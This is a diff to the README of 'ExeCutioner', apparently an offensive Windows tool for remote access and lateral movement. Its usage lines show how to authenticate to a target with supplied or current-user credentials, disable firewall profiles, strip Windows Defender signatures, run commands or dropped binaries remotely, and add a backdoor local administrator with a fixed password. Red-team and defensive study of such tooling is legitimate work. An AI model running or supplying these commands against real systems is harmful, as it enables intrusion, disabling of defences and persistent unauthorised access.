anans3-gh/ExeCutioner/README.md

 //Authenticate to target with username and password and disable firewall profiles ExeCutioner.exe /t <target name or IP> /user <username> /pass <password> /domain <domain> /nofw true

-//Authenticate to target with current user token and turn off av (Windows Defender) - useful and facilitates easier lateral movement/code execution
+//Authenticate to target with current user token and remove AV signatures (Windows Defender) - useful and facilitates easier lateral movement/code execution
 ExeCutioner.exe /t <target name or IP> /syscreds true /noav true

 //Authenticate to target with current user token and execute command ExeCutioner.exe /t <target name or IP> /syscreds /cmd <command-to-run-in-qoutes>

-//Authenticate to target with current user token and execute binary for lateral movement ExeCutioner.exe /t <target name or IP> /syscreds /cmd <\\192.168.10.8\\lateralmovement.exe>
+//Authenticate to target with current user token and execute binary for lateral movement.
+Works when with binaries dropped unto target.
+ExeCutioner.exe /t <target name or IP> /syscreds /cmd <C:\lateralmovement.exe>

 //Authenticate to target with current user token and add a new Local Administrator - username "newguy" with password "MakeLife123"
 ExeCutioner.exe /t <target name or IP> /syscreds /addadmin true